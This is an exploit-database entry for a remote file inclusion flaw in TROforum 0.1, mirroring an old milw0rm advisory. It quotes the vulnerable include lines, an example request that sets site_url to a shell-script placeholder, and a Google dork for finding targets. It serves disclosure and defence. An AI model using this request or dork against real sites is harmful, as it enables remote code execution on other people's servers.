header-logo
Suggest Exploit
vendor:
TROforum
by:
Not mentioned
7.5
CVSS
HIGH
Remote File Inclusion
Not mentioned
CWE
Product Name: TROforum
Affected Version From: TROforum 0.1 and below
Affected Version To: TROforum 0.1
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

TROforum 0.1 <= Remote File Inclusion Vulnerability

This exploit allows an attacker to include remote files in the vulnerable application, which can lead to remote code execution.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and sanitization.
Source

Exploit-DB raw data:

##############################################################################################
# TROforum 0.1  <=  Remote File Inclusion Vulnerability                                      #
#                                                                                            #

#Dork:http://www.google.com.tr/search?hl=tr&q=%22TROforum+0.1%22&meta=                       #
#                                                                                            #

#                                                                                            #
##############################################################################################
#Vuln Code                                                                                   #  

#                                                                                            # 
#ERROR1:admin/admin.php                                                                      # 
#                                                                                            # 

include ("$site_url/trofimov.php");    include ("$site_url/narod.php");  <<<RFI              #
#                                                                                            # 

#                                                                                            # 
#                                                                                            # 
#BUG1:                                                                                       # 

#                                                                                            # 
#Example1:http://victim.com/path/admin/admin.php?site_url=[[Sh3LL Script]]                   #
##############################################################################################


##############################################################################################

#                                                                                            # 
#Script Download                                                                             # 
##############################################################################################

#                                                                                            # 
#http://scripts.protoplex.ru/scripts_show/1277.html                                          # 
#                                                                                            # 

##############################################################################################
#                                                                                            # 
#Cyber-Security <>                                                                           # 

#                                                                                            # 
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-26]